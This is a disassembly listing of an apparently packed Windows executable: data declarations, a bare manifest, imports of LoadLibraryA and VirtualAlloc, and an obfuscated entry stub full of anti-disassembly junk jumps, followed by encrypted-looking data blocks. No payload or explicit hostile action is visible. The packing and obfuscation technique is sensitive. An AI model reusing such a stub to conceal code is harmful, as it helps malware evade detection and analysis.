dword_426410 dd 0 ; DATA XREF: sub_40BF57+14�r
; sub_40BF57+3A�w ...
dword_426414 dd 0 ; DATA XREF: sub_40C33C+F�r
; sub_40C33C+37�w ...
dword_426418 dd 0 ; DATA XREF: .kSjx934:off_423F3C�o
; .kSjx934:off_423F40�o ...
dword_42641C dd 0 ; DATA XREF: sub_40CAFA+4�w
; sub_40CB14+11�r ...
dword_426420 dd 0 ; DATA XREF: sub_40D5BD+A�r
dword_426424 dd 0 ; DATA XREF: sub_40DCCF+4�w
; sub_40DD29:loc_40DD72�o ...
dword_426428 dd 0 ; DATA XREF: sub_40DCCF+9�w
; sub_40DD29:loc_40DDC8�o ...
dword_42642C dd 0 ; DATA XREF: sub_40DCCF+E�w sub_40DD1C�r ...
dword_426430 dd 0 ; DATA XREF: sub_40DCCF+13�w
; sub_40DD29:loc_40DDD4�o ...
align 8
dword_426438 dd 0 ; DATA XREF: sub_40DED9+4�w
dd 2 dup(0)
dword_426444 dd 0 ; DATA XREF: sub_40DEE3+4�w
dd 0Fh dup(0)
dword_426484 dd 0 ; DATA XREF: sub_4081FF+6�r
dword_426488 dd 0 ; DATA XREF: sub_40F524+10�r
; sub_40F524+60�w ...
dword_42648C dd 0 ; DATA XREF: sub_40F524+75�w
; sub_40F524:loc_40F672�r
dword_426490 dd 0 ; DATA XREF: sub_40F524+82�w
; sub_40F524+167�r
dword_426494 dd 0 ; DATA XREF: sub_40F524+D0�w
; sub_40F524:loc_40F5F9�r
dword_426498 dd 0 ; DATA XREF: sub_40F524+BA�w
; sub_40F524+E1�r ...
align 10h
dword_4264A0 dd 0 ; DATA XREF: sub_40F76B+F�w
dd 2Fh dup(0)
dword_426560 dd 0 ; DATA XREF: sub_410889:loc_4108B1�r
byte_426564 db 0 ; DATA XREF: sub_410A54:loc_410B90�r
align 4
dword_426568 dd 0 ; DATA XREF: sub_419A10+4B�r
; sub_419EA0+E6�w ...
dword_42656C dd 0 ; DATA XREF: sub_419948+14�r
; sub_4199AC+14�r ...
dword_426570 dd 0 ; DATA XREF: sub_4198D2+1D�r
; sub_419EA0+136�w ...
dword_426574 dd 0 ; DATA XREF: sub_419A10+1C�r
; sub_419EA0+AA�w ...
dword_426578 dd 0 ; DATA XREF: sub_419EA0+BE�w
; sub_419EA0+16D�r ...
dword_42657C dd 0 ; DATA XREF: sub_419EA0+D2�w
; sub_419EA0+179�r ...
dword_426580 dd 0 ; DATA XREF: sub_419948+34�r
; sub_4199AC+34�r ...
dword_426584 dd 0 ; DATA XREF: sub_419A10+63�r
; sub_419EA0+FA�w ...
dword_426588 dd 0 ; DATA XREF: sub_419EA0+14A�w
; sub_419EA0+322�r
dword_42658C dd 0 ; DATA XREF: sub_419EA0+96�w
; sub_419EA0+155�r ...
dword_426590 dd 0 ; DATA XREF: sub_419948+4D�r
; sub_4199AC+4D�r ...
dword_426594 dd 0 ; DATA XREF: sub_401C1D+6D�r
; sub_418B1F+A9�w ...
dword_426598 dd 0 ; DATA XREF: sub_401CC0+14F�r
; sub_41748B+11D�r ...
dword_42659C dd 0 ; DATA XREF: sub_401CC0+149�r
; sub_41748B+116�r ...
dword_4265A0 dd 0 ; DATA XREF: sub_401CC0+143�r
; sub_418DA0+61�w
dword_4265A4 dd 0 ; DATA XREF: sub_401CC0+13D�r
; sub_418DA0+66�w
dword_4265A8 dd 0 ; DATA XREF: sub_401CC0+137�r
; sub_418DA0+71�w
dword_4265AC dd 0 ; DATA XREF: sub_401CC0+12A�r
; sub_418DA0+76�w
dword_4265B0 dd 0 ; DATA XREF: sub_418D5A�r
; sub_418D5A:loc_418D8F�w ...
dword_4265B4 dd 0 ; DATA XREF: sub_418D5A+5�r
; sub_418D5A+3B�w ...
dword_4265B8 dd 0 ; DATA XREF: sub_418D5A+15�r
; sub_4192FB+20�w ...
dword_4265BC dd 0 ; DATA XREF: sub_4192FB+25�w
dd 33h dup(0)
dword_42668C dd 2 dup(0) ; DATA XREF: sub_4192FB+43�o
word_426694 dw 0 ; DATA XREF: sub_41835D+8�o
; sub_418B1F+AE�w ...
word_426696 dw 0 ; DATA XREF: sub_418B1F+D1�w
dword_426698 dd 0 ; DATA XREF: sub_418B1F+BD�w
dd 2 dup(0)
dword_4266A4 dd 0 ; DATA XREF: sub_418C40+6�r
; sub_418C40+73�r ...
dword_4266A8 dd 41h dup(0) ; DATA XREF: sub_418552+1ED�o
; sub_418552+224�o ...
dword_4267AC dd 0 ; DATA XREF: sub_41835D+D�r
; sub_418B1F+84�w ...
byte_4267B0 db 0 ; DATA XREF: sub_418552+293�o
; sub_418552+477�o ...
align 4
dd 40h dup(0)
byte_4268B4 db 0 ; DATA XREF: sub_401F1C:loc_401F83�r
; sub_418B1F+117�w ...
align 4
dword_4268B8 dd 41h dup(0) ; DATA XREF: sub_418552:loc_41876F�o
; sub_418B1F+1A�o
dword_4269BC dd 0 ; DATA XREF: sub_401C1D+47�r
; sub_401CC0+F4�r ...
byte_4269C0 db 0 ; DATA XREF: .kSjx934:00413F6A�r
; sub_418301:loc_418331�r ...
align 4
dd 8 dup(0)
dword_4269E4 dd 0 ; DATA XREF: sub_41B5D2+33�w
; sub_41B5D2+8F�r ...
dword_4269E8 dd 40h dup(0) ; DATA XREF: sub_41B3D0+49�o
; sub_41B775+21�o
byte_426AE8 db 0 ; DATA XREF: sub_41A391+D7�o
; sub_41A391+132�w ...
align 4
dd 3Fh dup(0)
dword_426BE8 dd 0 ; DATA XREF: sub_401CC0+170�r
; sub_41A391+45�o
dword_426BEC dd 0 ; DATA XREF: sub_401CC0+17E�r
; sub_41A391:loc_41A51C�w ...
byte_426BF0 db 0 ; DATA XREF: sub_401F1C+4B7�w
align 4
dd 3Fh dup(0)
dword_426CF0 dd 0 ; DATA XREF: sub_401F1C+44A�r
; sub_401F1C+483�w
dd 3 dup(0)
db 0
byte_426D01 db 0 ; DATA XREF: sub_401F1C:loc_4020A2�r
; sub_40243A+AF�w
align 10h
dword_426D10 dd 0 ; DATA XREF: sub_40243A:loc_4024C3�r
dd 8F0h dup(0)
db 3 dup(0)
byte_4290D7 db 0 ; DATA XREF: sub_40251A+9A�o
dd 2A1Ah dup(0)
dword_433940 dd 0 ; DATA XREF: sub_40251A+A6�r
; sub_418552+501�r ...
db 0
byte_433945 db 0 ; DATA XREF: sub_401F1C+3E�r
; sub_41B5D2:loc_41B60E�w ...
align 4
dword_433948 dd 0 ; DATA XREF: sub_41B5D2+13B�w
dword_43394C dd 0 ; DATA XREF: sub_40251A+90�r
; sub_41B3D0:loc_41B53E�w ...
dword_433950 dd 5Eh dup(0) ; DATA XREF: sub_41A9DE+48A�o
dword_433AC8 dd 5Dh dup(0) ; DATA XREF: sub_41A9DE+4AD�o
dword_433C3C dd 0 ; DATA XREF: sub_417676+110�o
; sub_41BB84+43�o ...
dword_433C40 dd 0 ; DATA XREF: sub_417676+109�r
; sub_417676+122�r ...
dword_433C44 dd 0 ; DATA XREF: sub_40121E+20�r
; sub_40121E:loc_40127B�w ...
dword_433C48 dd 0 ; DATA XREF: sub_413F8F+14�o
; sub_414042+15�o ...
dword_433C4C dd 0 ; DATA XREF: sub_40243A:loc_402453�r
; sub_40243A:loc_402462�r ...
dword_433C50 dd 0 ; DATA XREF: sub_4016BA+20�r
; sub_4016BA:loc_401717�w ...
dword_433C54 dd 0 ; DATA XREF: .kSjx934:0041C3CC�o
; .kSjx934:0041C3D6�w
dword_433C58 dd 0 ; DATA XREF: .kSjx934:0041C3B0�o
; .kSjx934:0041C3BA�w
dword_433C5C dd 0 ; DATA XREF: .kSjx934:0041C3E8�o
; .kSjx934:0041C3F2�w
dword_433C60 dd 0 ; DATA XREF: .kSjx934:0041C404�o
; .kSjx934:0041C40E�w
dword_433C64 dd 0 ; DATA XREF: .kSjx934:0041C420�o
; .kSjx934:0041C42A�w
dword_433C68 dd 0 ; DATA XREF: sub_41A9DE+4FD�r
; .kSjx934:0041C43E�w
dword_433C6C dd 0 ; DATA XREF: .kSjx934:0041C466�o
; .kSjx934:0041C470�w
dword_433C70 dd 0 ; DATA XREF: .kSjx934:0041C482�o
; .kSjx934:0041C48C�w
dword_433C74 dd 0 ; DATA XREF: .kSjx934:0041C44A�o
; .kSjx934:0041C454�w
dword_433C78 dd 0 ; DATA XREF: sub_403DA0�r sub_40A6DB�w ...
dword_433C7C dd 0 ; DATA XREF: sub_407370+28�r
; sub_407B70+1E�r ...
dword_433C80 dd 0 ; DATA XREF: sub_40A42B+34�r
dword_433C84 dd 0 ; DATA XREF: sub_4087E0+3C�w
; sub_4087E0+BF�w ...
dd 6 dup(0)
dword_433CA0 dd 0 ; DATA XREF: sub_4067D6+FD�r
; sub_40808A+87�r ...
dd 3Fh dup(0)
dword_433DA0 dd 0 ; DATA XREF: sub_40808A+2B�w
; sub_40808A+44�w ...
dd 7 dup(0)
dword_433DC0 dd 400h dup(0) ; DATA XREF: .kSjx934:off_423950�o
; .kSjx934:00423958�o
dword_434DC0 dd 0 ; DATA XREF: sub_40808A�r
; sub_40808A:loc_4080A4�w ...
dword_434DC4 dd 0 ; DATA XREF: sub_407B65�w
dword_434DC8 dd 0 ; DATA XREF: sub_40ABE1+B3�w
dword_434DCC dd 0 ; DATA XREF: sub_402D09+10�r
; sub_402D09+9B�w ...
dword_434DD0 dd 0 ; DATA XREF: sub_402D09+5�r
; sub_402D09+87�w ...
dword_434DD4 dd 0 ; DATA XREF: sub_404E03�r
; sub_404E03+11�w ...
dword_434DD8 dd 0 ; DATA XREF: sub_407979:loc_4079E2�r
; sub_407979+74�o ...
dword_434DDC dd 0 ; DATA XREF: sub_405ADD+28�w
; sub_405B25�r ...
dword_434DE0 dd 0 ; DATA XREF: sub_405ADD+15�w
; sub_405B25+6�r ...
dword_434DE4 dd 0 ; DATA XREF: sub_403691+13�r
; sub_405ADD+36�w ...
dword_434DE8 dd 0 ; DATA XREF: sub_405ADD+2F�w
; sub_405B50+2FC�w ...
dword_434DEC dd 0 ; DATA XREF: sub_405ADD+3C�w
; sub_405E64�r ...
dword_434DF0 dd 0 ; DATA XREF: sub_405B50+229�r
; sub_405B50+249�r ...
dword_434DF4 dd 0 ; DATA XREF: sub_402A45:loc_402A7E�r
; sub_403603+13�r ...
dword_434DF8 dd 0 ; DATA XREF: .kSjx934:0040404B�w
; sub_40AB84:loc_40AB95�r ...
align 400h
_kSjx934 ends
; Section 4. (virtual address 00035000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00035000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_kSjx934 segment para public 'BSS' use32
assume cs:_kSjx934
;org 435000h
assume es:nothing, ss:nothing, ds:_kSjx934, fs:nothing, gs:nothing
dd 2 dup(0)
dd 4, 10000h, 18h, 80000018h, 2 dup(0)
dd 4, 10000h, 1, 80000030h, 2 dup(0)
dd 4, 10000h, 409h, 48h, 35058h, 56h, 4E4h, 0
aAssemblyXmlnsU db '<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersio'
db 'n="1.0">',0Dh,0Ah
db '</assembly>PA',0
align 4
dd 308h dup(0)
db 3 dup(0)
byte_435CD7 db 0 ; DATA XREF: sub_40243A+CA�o
align 400h
_kSjx934 ends
; Section 5. (virtual address 00036000)
; Virtual size : 0000A000 ( 40960.)
; Section size in file : 0000A000 ( 40960.)
; Offset to raw data for section: 00036000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_kSjx934 segment para public 'BSS' use32
assume cs:_kSjx934
;org 436000h
assume es:nothing, ss:nothing, ds:_kSjx934, fs:nothing, gs:nothing
dd 36028h, 2 dup(0)
dd 3604Fh, 36028h, 5 dup(0)
dd 77E805D8h, 77E7980Ah, 0
aLoadlibrarya db 'LoadLibraryA',0
align 2
aVirtualalloc db 'VirtualAlloc',0
aKernel32_dl_11 db 'KERNEL32.dll',0
; ---------------------------------------------------------------------------
public start
start:
xchg eax, ecx
rep and eax, edx
rep and ecx, 5Fh
jmp short loc_436068
; ---------------------------------------------------------------------------
dw 20CDh
; ---------------------------------------------------------------------------
loc_436068: ; CODE XREF: .kSjx934:00436064�j
repne rol eax, 1Bh
jmp short loc_436070
; ---------------------------------------------------------------------------
dw 20CDh
; ---------------------------------------------------------------------------
loc_436070: ; CODE XREF: .kSjx934:0043606C�j
jmp short loc_436074
; ---------------------------------------------------------------------------
dw 23CCh
; ---------------------------------------------------------------------------
loc_436074: ; CODE XREF: .kSjx934:loc_436070�j
adc eax, eax
clc
jnb short near ptr loc_436079+1
loc_436079: ; CODE XREF: .kSjx934:00436077�j
and edi, ecx
jb short near ptr loc_43607D+1
loc_43607D: ; CODE XREF: .kSjx934:0043607B�j
db 64h
push offset dword_43625C
rep not ecx
jmp short loc_436089
; ---------------------------------------------------------------------------
db 0D0h
; ---------------------------------------------------------------------------
loc_436089: ; CODE XREF: .kSjx934:00436086�j
repne ror eax, 13h
repne mov eax, esi
stc
jb short near ptr loc_436093+1
loc_436093: ; CODE XREF: .kSjx934:00436091�j
sub bl, [esi-15h]
add ah, dl
sahf
jmp short loc_43609D
; ---------------------------------------------------------------------------
db 0CDh
db 20h
; ---------------------------------------------------------------------------
loc_43609D: ; CODE XREF: .kSjx934:00436099�j
repne movzx ecx, cl
jmp short loc_4360A5
; ---------------------------------------------------------------------------
db 33h
db 0E9h
; ---------------------------------------------------------------------------
loc_4360A5: ; CODE XREF: .kSjx934:004360A1�j
clc
jnb short near ptr loc_4360A8+1
loc_4360A8: ; CODE XREF: .kSjx934:004360A6�j
db 26h
lea ebx, es:80000h
clc
jnb short near ptr loc_4360B2+1
loc_4360B2: ; CODE XREF: .kSjx934:004360B0�j
cmp bh, cl
jb short near ptr loc_4360B6+1
loc_4360B6: ; CODE XREF: .kSjx934:004360B4�j
mov ecx, 0F3D80172h
dec eax
clc
jnb short near ptr loc_4360C0+1
loc_4360C0: ; CODE XREF: .kSjx934:004360BE�j
mov ch, 0C1h
retf
; ---------------------------------------------------------------------------
db 49h
dd 5B0173F8h, 2B8B02EBh, 20CD02EBh, 5C0172F9h, 41F2C0D1h
dd 0A17D02EBh, 0F7C003F3h, 172F9D9h, 16B60FC9h, 0EBEE01EBh
dd 2 dup(0EB20CD02h), 0EBA51B02h, 0F8F4A302h, 0F3E90173h
dd 0EB5FE883h, 0F320CD02h, 2EB5E2Ch, 0D332D892h, 2EBCE13h
dd 48F320CDh, 597C02EBh, 81C03BF2h, 3D15CBEAh, 0AE02EBC0h
dd 1E8E8h, 58450000h, 0FC0C1F3h, 800173F8h, 57C980F3h
dd 72F9D302h, 0C169B901h, 7D222D9Ch, 0D90173F8h, 73F8D8F7h
dd 0D3024401h, 20CD02EBh, 5FC083F3h, 20CD02EBh, 3A0172F9h
dd 0D60702EBh, 1E8D32Ah, 58000000h, 0F891F359h, 40750173h
dd 10DB02EBh, 36C280F2h, 20CD02EBh, 0BF341F2h, 0CD02EBC3h
dd 1CE8C120h, 8E3EA81h, 0FF272C8h, 0E1C1C9B6h, 3901EB08h
dd 1201EB41h, 0F183D332h, 8E0C119h, 1EBC703h, 0CD02EBAEh
dd 0AC28020h, 20CD02EBh, 3E183F2h, 3CA8B48h, 0EA80F2CBh
dd 0C713F327h, 83F2D9F7h, 73F89BE1h, 0F7F38C01h, 0F91688D9h
dd 0E8530172h, 2, 0F3596DDAh, 1EB6E34h, 0CD02EB6Bh, 0F246F320h
dd 73F8C88Bh, 1EBCA01h, 10C8C1D9h, 4BF2D1F7h, 0E70173F8h
dd 20CD02EBh, 6920C180h, 74A244C9h, 172F920h, 0D8D24h
dd 0F2000000h, 0BF0FD93Bh, 0C78BF3C6h, 0E8C9BE0Fh, 1, 2EB5867h
dd 1EB57F6h, 5F01EBFEh, 2 dup(20CD02EBh), 0FC9B60Fh, 0FFFE8985h
dd 0C13BF3FFh, 0F180C92Bh, 7DC18358h, 770173F8h
dword_43625C dd 0F2D3F7F2h, 69F3D633h, 377D1EDBh, 1E842h, 5AFA0000h
; DATA XREF: .kSjx934:loc_43607D�o
dd 20CD02EBh, 770172F9h, 6E0172F9h, 8D0172F9h, 0C1D1234Ah
dd 80F209E3h, 5CB892C3h, 0F2004366h, 0BE0FD01Bh, 173F8D0h
dd 0CBC1F3C0h, 0CBC1F317h, 0EB80F317h, 92BBBE56h, 33F30000h
dd 2EB43D9h, 1EB1259h, 8102EB12h, 43D21B0Dh, 0C1D38BF3h
dd 0F7F31CF3h, 0B70FF2DAh, 0FF02EBD6h, 38BE0FA2h, 8B0173F8h
dd 345102EBh, 1EBD603h, 7D01EB34h, 0F31D01EBh, 2EBD123h
dd 1EB8BFAh, 172F97Fh, 173F82Fh, 0D2BE0FC5h, 1E8FE2Bh
dd 0F2000000h, 0EF02EB5Bh, 173F850h, 173F80Eh, 0BE0FF2A1h
dd 172F9D2h, 0F781F378h, 5497389Eh, 5CE202EBh, 9C0173F8h
dd 4BE283F2h, 20CD02EBh, 2EBDA03h, 83F3207Fh, 2EB1FEFh
dd 0C2810C20h, 30F2750Ch, 500173F8h, 27EB80F3h, 2EBD013h
dd 0FE3320CDh, 6C3C1F3h, 2E2C1F2h, 0F102EB4Bh, 0B60FF38Eh
dd 0D387F2DAh, 0E8ABEF81h, 72F94975h, 43F34501h, 0BA0172F9h
dd 0EB9701EBh, 0E80A9202h, 2, 835A2A54h, 2EB0AC7h, 0B60FC8D8h
dd 0C801EBD2h, 0E8D2BE0Fh, 2, 0EB5B52A4h, 83B18A02h, 0C1F262C7h
dd 2EB1BC2h, 108AC085h, 6FE383F3h, 2E8h, 5B244800h, 0EF81DA3Bh
dd 0B3E19883h, 66F280F3h, 3ECA81F3h, 0F8A623FBh, 33D90173h
dd 173F8D3h, 173F81Fh, 0F2FE3323h, 0EB53C283h, 0E2832C01h
dd 0F8D12321h, 0F9320173h, 2B460172h, 173F8FEh, 0DEBF0F24h
dd 0E8D9BE0Fh, 1, 0DB1B5B8Ch, 0F31BF2C1h, 0EFDEC781h, 72F991DAh
dd 73F8BF01h, 73F87701h, 2EBAE01h, 3F223B5h, 9101EBDAh
dd 64EF83F2h, 7F383F3h, 53EB83F2h, 0C1F2188Ah, 2EB0AEBh
dd 73F84896h, 0FE331201h, 81F2108Ah, 5EC7DAC3h, 173F851h
dd 0C702EB3Eh, 0CD02EB5Eh, 0EBC1F220h, 0A2C7810Bh, 0F59E39Eh
dd 2EBDFBFh, 2EB20CDh, 1EB20CDh, 0CD02EB9Eh, 0AC02EB20h
dd 6BEF83F5h, 0EB0172F9h, 83FD01EBh, 2EBB5E3h, 72F9F12Bh
dd 0D3872501h, 0B7EF81F2h, 0F8B1CB41h, 0E8830173h, 1, 0CAC15AB4h
dd 0CD02EB1Ch, 0EC01EB20h, 0FCBC1F3h, 80F2FE33h, 2EBAAC3h
dd 2E8895Eh, 4A000000h, 81F35B25h, 0C9FF0ECAh, 1E8A1h
dd 5AFE0000h, 20CD02EBh, 3FEF83F3h, 1E8h, 0F25A3900h, 0D203D32Bh
dd 0B74C02EBh, 37C383F3h, 3DF8BF2h, 1302EBFEh, 0C202EBE6h
dd 0CD02EB9Ch, 0DEB70F20h, 0E8D3B60Fh, 2, 835A61C2h, 2EB58EFh
dd 81F220CDh, 7CF6EACBh, 0CD02EB95h, 3D02EB20h, 0DB2BF25Fh
dd 8395F380h, 0DB0372C7h, 0C109C3C1h, 2EB1DE2h, 2EB20CDh
dd 0E28320CDh, 9AF781D1h, 0F8997EC9h, 0F74C0173h, 173F8D3h
dd 2F02EB7Eh, 1E853h, 5B990000h, 32CA80F2h, 62E3EF81h
dd 0EAC184F0h, 0E8D2F718h, 2, 0E85B4284h, 1, 2EB5A72h
dd 73F81A2Eh, 0FE33A201h, 0EB80D385h, 173F8A4h, 2E83Ah
dd 8C190000h, 0E283F35Bh, 0DAF7F346h, 37EF83F2h, 7B5C02EBh
dd 0D7B70FF2h, 0F9DE01EBh, 0EBFB0172h, 0EB1ECF02h, 0F220CD02h
dd 0B0F6F781h, 1EB0F92h, 172F9C3h, 9E3C158h, 0EBD91BF3h
dd 0F3DBC102h, 0D78BF34Bh, 81F21088h, 0DD2B92E2h, 0DE0BF3E3h
dd 0F2A501EBh, 0EB7BEA83h, 0EB20CD02h, 40131C02h, 20CD02EBh
dd 702602EBh, 40173F8h, 0EE2C1F3h, 0F98201EBh, 4E700172h
dd 0D2B60FF2h, 73F8D2F7h, 0B60FD401h, 173F8D2h, 0FE83421Dh
dd 1E800h, 5ACD0000h, 0EBD2BE0Fh, 0EB5B1702h, 8720CD02h
dd 0CD02EBD3h, 0DEB70F20h, 20CD02EBh, 0EB1701EBh, 0F20CD02h
dd 1EBD2BEh, 74850F20h, 0EBFFFFFCh, 1EBF401h, 0F2EBD1E9h
dd 0F203CA80h, 962C281h, 0D72BE9FEh, 9AACB855h, 0B991DEh
dd 35000002h, 919E9AACh, 32FFCA83h, 0D3FF0154h, 0E8F8E2C2h
dd 0F2h, 6028BDFCh, 406A0043h, 300068h, 20006800h, 8B510001h
dd 3A800455h, 0C1940FCCh, 0D2FFD103h, 756958Dh, 52500000h
dd 748B6050h, 7C8B2424h, 0CD832824h, 0F9C933FFh, 68A0CEBh
dd 47078846h, 973DB02h, 1E8AF475h, 72DB1246h, 1B8EDh, 0DB020000h
dd 1E8A0575h, 13DB1246h, 73DB02C0h, 8A0775F1h, 0DB12461Eh
dd 0E883E873h, 0C10D7203h, 68A08E0h, 0FFF08346h, 0E88B6E74h
dd 575DB02h, 12461E8Ah, 2C913DBh, 8A0575DBh, 0DB12461Eh
dd 1C75C913h, 75DB0241h, 461E8A05h, 0C913DB12h, 0F173DB02h
dd 1E8A0775h, 73DB1246h, 2C183E8h, 0F300FD81h, 0D183FFFFh
dd 3D548D01h, 0FCFD8300h, 28A0E76h, 47078842h, 0E9F77549h
dd 0FFFFFF70h, 0C283028Bh, 83078904h, 0E98304C7h, 3F17704h
dd 0E9C933F9h, 0FFFFFF58h, 28247C2Bh, 1C247C89h, 0B958C361h
dd 0F2h, 0FF015428h, 0F8E2C2D3h, 2EBC350h, 7C83AE9Dh, 0EB000424h
dd 0EBAE9D02h, 98689D01h, 0EB77E79Fh, 0C320CD02h, 2 dup(0AE9D02EBh)
dd 67AC6855h, 2EB0043h, 0C320CDh, 2EBEC8Bh, 75FFAE9Dh
dd 0CD02EB08h, 9D02EB20h, 0A83D68AEh, 0CD6877E7h, 0EB004367h
dd 0C320CD02h, 2EBC300h, 2EB20CDh, 0C15520CDh, 0EC8B00F0h
dd 20CD02EBh, 0EB1075FFh, 0FFAE9D02h, 2EB0C75h, 75FFAE9Dh
dd 9D01EB08h, 2EBFF6Ah, 0F0C1AE9Dh, 3640E900h, 0F0C177A4h
dd 0F0C100h, 0F0C155h, 2EBEC8Bh, 75FF20CDh, 9D02EB14h
dd 1075FFAEh, 0AE9D02EBh, 0EB0C75FFh, 75FF9D01h, 0CD02EB08h
dd 0EBFF6A20h, 2EB9D01h, 1B68AE9Dh, 0EB77E798h, 0C3AE9D02h
dd 0AE9D02EBh, 43684F68h, 0CD02EB00h, 8300C320h, 4247Ch
dd 539D01EBh, 0AE9D02EBh, 0F0C156h, 20CD02EBh, 0E805DF68h
dd 9D02EB77h, 7968C3AEh, 0EB004368h, 0C320CD02h, 0D31CD600h
dd 43DF1AB5h, 7C8B9304h, 0EB10FE24h, 0E881F202h, 0E232ED01h
dd 0FC25BF8Fh, 725703EBh, 0F122BB7h, 0F6A6238Ah, 424648Dh
dd 4DFE3209h, 926ECF9h, 0C1ED2C67h, 0DB2E00F1h, 5C0387C7h
dd 20CD9F97h, 64C11863h, 368DC92Ch, 23D5D15h, 3BB2AD8h
dd 0DB29B21Fh, 0A5978003h, 80FE915Eh, 840FFF3Fh, 21D60458h
dd 3A903626h, 6893094Ch, 332F626h, 7B037AFBh, 0F5BD6D01h
dd 9DF4C1F0h, 1D9E2231h, 3EBAC0Fh, 211B11A4h, 4DAF3EC8h
dd 560EC6BFh, 5B1C52F7h, 0D8B8124Eh, 0FB471547h, 75EE3503h
dd 2AAA1B1Bh, 430A57E1h, 4484363Bh, 1B16926Bh, 680753ABh
dd 7103F770h, 0F7322501h, 600F7C1h, 730372FDh, 8BB5A01h
dd 1B263A3Eh, 453D59E6h, 0D3F993E6h, 374117Fh, 6E01D875h
dd 47ECD90Eh, 717F8FEDh, 0E42131FFh, 1770376h, 37557508h
dd 5B2B0DBDh, 0A451C1F7h, 0FD75AE7Bh, 49381B28h, 8036031Fh
dd 350E6324h, 6AC9FB64h, 66890F7Bh, 1FC93226h, 9B2FA384h
dd 7CFE092Bh, 0E1017D03h, 4A9226C9h, 0FD46D26Ch, 0F6C1058Ch
dd 0C03C7B8h, 0EC0B3D56h, 6C19DFE9h, 1C9B23E3h, 10B306F4h
dd 0B19E4662h, 810BB216h, 0CEFF037Ch, 0D975211Dh, 943636D7h
dd 8D9C1DF2h, 18E19B0Eh, 0EA6EC36h, 1D232463h, 0C28300F3h
dd 56036E30h, 0C948DEF7h, 0CEB7C2Fh, 0C41B2122h, 0B60FF83Fh
dd 0AD90D007h, 3AEC191Dh, 6C154FC0h, 0EE9BD723h, 9741DC09h
dd 0BE017990h, 0EE5E9AFBh, 0F7C1963Ah, 49F187CEh, 0F0F54D84h
dd 0AFBE9BF4h, 0B4F4C03h, 0E78224DFh, 7FB5037Eh, 2937F6C8h
dd 43D7E10Dh, 89F51BC6h, 417210B7h, 3C524B69h, 4AFC425Dh
dd 6C2E123Ch, 3F7E919h, 0D15E1E1Dh, 84C6F615h, 1DD55376h
dd 2017BB5Ch
dd 0ED7860A9h, 49767A94h, 93771D39h, 2D083AADh, 0C06C0D6Ch
dd 0C5F39B9Dh, 0BF32F21Bh, 1F89E5EDh, 5A6C783h, 0A7030DBFh
dd 386BB4BAh, 29D8DB30h, 6154D1C6h, 0D673FB6Fh, 0D8A41E34h
dd 36604BF2h, 6C4D6AA1h, 18BA5C93h, 0F7C15E2Eh, 37782C13h
dd 49D073FBh, 0C71BF77Bh, 70C07F04h, 0CC3880F3h, 0E8F474FCh
dd 2700A721h, 41EC0390h, 6C379624h, 8A994165h, 0E9E5A310h
dd 0BC7D46EEh, 0D280817h, 9187DF5Fh, 7309F5C1h, 0E3CB6AD8h
dd 2D5900F4h, 20EF098Dh, 3B7DC67h, 1571C91Bh, 841684B1h
dd 3EF711F5h, 0EB273EA5h, 0FD9985E1h, 4203BD73h, 14BBEFEAh
dd 0AD2B6362h, 0EE10CB0h, 34EF1B4h, 69E3FDB2h, 6D03FA33h
dd 1F9DA203h, 9069832Eh, 64B9036Eh, 0D6B8B65Dh, 0F745970Bh
dd 0AC98947Ch, 760D33DDh, 0F791281Fh, 0FB1FE947h, 0BAD5F76Bh
dd 6C20FFCh, 620E1367h, 0B9911FE8h, 5D106395h, 0F3BAA19h
dd 711B1054h, 0C93F2686h, 8D0B8CE4h, 955B2417h, 6BC78F58h
dd 0CF6D0B4Ch, 96DD0DECh, 0FD121127h, 0C25F5E5Bh, 0D430000Ch
dd 6BEBE067h, 7654F875h, 0FF81FA9Dh, 52535756h, 0D800E851h
dd 0FF000004h, 77073096h, 0FF0E612Ch, 951BAEEh, 6DC41999h
dd 0F48F07FFh, 0A535706Ah, 0A3E9FF63h, 329E6495h, 0EFFDB88h
dd 79DCB8A4h, 0FFD5E91Eh, 0D2D988E0h, 0B64C2B97h, 7CBD09FFh
dd 2D077EB1h, 91E7FFB8h, 6490BF1Dh, 1DFFB710h, 6AB020F2h
dd 0FFB97148h, 0BE41DEF3h, 0DAD47D84h, 0E4EB1AFFh, 0B5516DDDh
dd 0C7F4FFD4h, 5683D385h, 13FF6C98h, 646BA8C0h, 0FF62F97Ah
dd 65C9ECFDh, 15C4F8Ah, 6CD914FFh, 3D636306h, 0F5FAFF0Fh
dd 0C88D080Dh, 3BFF6E20h, 4C69105Eh, 0FF6041E4h, 677172D5h
dd 3E4D1A2h, 0D4473CFFh, 85FD4B04h, 6BD2FF0Dh, 0FAA50AB5h
dd 35FFB5A8h, 42B2986Ch, 0FFBBC9D6h, 0BCF940DBh, 0D86CE3ACh
dd 5C7532FFh, 0DCF45DFh, 59DCFFD6h, 0ACABD13Dh, 26FFD930h
dd 51DE003Ah, 0FFD75180h, 0D06116C8h, 0B4F4B5BFh, 0C42321FFh
dd 959956B3h, 0FCFFFBAh, 9EB8BDA5h, 28FF02B8h, 5F058808h
dd 0FF0CD9B2h, 0BE924C6h, 6F7C87B1h, 4C112FFFh, 1DAB5868h
dd 3DC1FF61h, 90B6662Dh, 76FFDC41h, 1DB7106h, 0FFD220BCh
dd 0D5102A98h, 0B18589EFh, 0B51F71FFh, 0E4A506B6h, 339FFFBFh
dd 0A2E8B8D4h, 78FF07C9h, 0F00F934h, 0FF09A88Eh, 0E981896h
dd 6A0DBBE1h, 3D2D7FFFh, 6C97086Dh, 7B91A564h, 0F4E663FFh
dd 626B6B51h, 1C6CFF61h, 856530D8h, 62FF004Eh, 695EDF2h
dd 0C6A57B6Ch, 0FF8D1B01h, 0C4578208h, 0FFC6F50Fh, 5065B0D9h
dd 0EA12B7E9h, 0BFBEB8C1h, 0FCB988DBh, 0DDFF1DDFh, 0DA2D4962h
dd 0FF7CF315h, 4C658CD3h, 6158FBD4h, 0CE4DB2E1h, 743A7F2Ch
dd 0E2A3BC00h, 0D4BB30FFh, 4ADFA541h, 0D895DBD7h, 0D1FFC461h
dd 0D6F4FBA4h, 0FFE96AD3h, 0D9FC4369h, 8846346Eh, 0D0AD67FFh
